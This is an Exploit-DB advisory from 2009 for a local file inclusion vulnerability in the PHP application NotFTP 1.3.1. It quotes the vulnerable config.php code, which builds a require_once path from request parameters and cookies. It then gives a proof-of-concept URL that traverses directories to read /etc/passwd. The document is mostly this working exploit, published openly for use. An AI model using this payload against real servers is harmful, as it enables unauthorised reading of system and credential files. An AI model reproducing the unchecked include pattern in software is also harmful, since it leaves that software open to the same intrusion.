NotFTP 1.3.1 - newlang Local File Inclusion Vulnerability

2009-04-21T00:00:00
ID EDB-ID:8504
Type exploitdb
Reporter Kacper
Modified 2009-04-21T00:00:00

Description

NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability. CVE-2009-1407. Webapps exploit for php platform

                                        
                                            NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

========= 

# milw0rm.com [2009-04-21]